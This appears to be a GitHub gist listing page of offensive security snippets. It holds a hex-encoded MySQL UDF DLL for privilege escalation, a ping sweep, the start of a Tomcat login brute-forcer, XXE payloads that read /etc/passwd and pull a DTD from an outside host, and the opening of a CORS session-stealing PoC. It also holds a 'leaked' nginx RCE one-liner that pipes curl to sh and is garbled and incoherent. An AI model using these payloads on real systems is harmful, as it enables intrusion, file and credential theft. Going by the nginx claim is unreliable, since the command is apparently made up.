Skip to content

Instantly share code, notes, and snippets.

View trackscorer's full-sized avatar

trackscorer

3 followers · 9 following
View GitHub Profile
@trackscorer
trackscorer / MySQL UDF 提权十六进制查询
Created August 23, 2023 08:54
lib_mysqludf_sys_32.dll:
SELECT 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a24000000000000004d477bd0092615830926158309261583005e86830b261583005e808308261583005e968307261583005e91830b2615832ee06e830a2615830926148325261583005e9c8308261583005e878308261583005e8483082615835269636809261583000000000000000000000000000000000000000000000000504500004c0103004afe9f5a0000000000000000e00002210b010900001000000010000000600000607c0000007000000080000000000010001000000002000005000000000000000500000000000000009000000010000000000000020000000000100000100000000010000010000000000000100000007c83000008020000b4820000c800000000800000b402000000000000000000000000000000000000848500001000000000000000000000000000000000000000000000000000000000000000000000002c7e000048000000000000000000000000000000000000000000000000000000000000000000000000000000000000
@trackscorer
trackscorer / pingscan.sh
Created December 19, 2022 07:14 — forked from blu3Alien/pingscan.sh
Shell script to scan a range of IP addresses. USAGE: ./pingscan 192.168.1.
#!/bin/sh
: ${1?"Usage: $0 ip subnet to scan. eg '192.168.1.'"}
subnet=$1
for addr in `seq 0 1 255 `; do
# ( echo $subnet$addr)
( ping -c 3 -t 5 $subnet$addr > /dev/null && echo $subnet$addr is Alive ) &
done
@trackscorer
trackscorer / gist:9f2e39cf22726f41e73ca5d16ed382cc
Created June 25, 2021 13:19
list
q
w
e
r
t
y
u
i
o
p
@trackscorer
trackscorer / index.html
Created June 21, 2021 10:46 — forked from darmie/index.html
base64ToArrayBuffer
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>JS Bin</title>
</head>
<body>
<script id="jsbin-javascript">
@trackscorer
trackscorer / Null-byte RCE overflow in nginx
Created April 27, 2020 06:59
LEAKED: Null-byte RCE overflow in nginx BLT/Stream
Nginx 1.x PoC one-liner:
curl -gsS victim.server.here:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00 \<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Issue: https://github.com/nginx/njs/issues/159
@trackscorer
trackscorer / tomcat_bruteforce.py
Created March 11, 2019 06:44 — forked from th3gundy/tomcat_bruteforce.py
Tomcat manager console bruteforce
"""
Tomcat bruteforce
Author: @itsecurityco
"""
import os
import sys
import getopt
import base64
import requests
@trackscorer
trackscorer / XXE and OOB
Created November 15, 2018 09:02
<?xml version=”1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM “file:///etc/passwd”>]>
<data>&file;</data>
<!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x/xxe.dtd"> %asd; %c;]>
xxe.dtd:
@trackscorer
trackscorer / aa
Created November 15, 2018 03:37
#!/bin/bash
read -p "Target IP/Hostname:" val
echo "$val"
ADDR=$val
TMPSTR=`ping ${ADDR} -c 1 | grep ${ADDR} | head -n 1`
echo ${TMPSTR} | cut -d'(' -f 2 | cut -d')' -f1
read -p "Save scan as (XML):" file
echo "$file"
nmap -p- -sV -O "$val" -oX "$file"
read -p "Input url and ext:" url ext
@trackscorer
trackscorer / uninstall nmap
Created November 15, 2018 03:28
# cd /usr/local
# rm -f bin/nmap bin/nmapfe bin/xnmap
# rm -f man/man1/nmap.1 man/man1/zenmap.1
# rm -rf share/nmap
# ./bin/uninstall_zenmap
@trackscorer
trackscorer / CORS Exploit
Created September 29, 2018 03:49
<!DOCTYPE html>
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>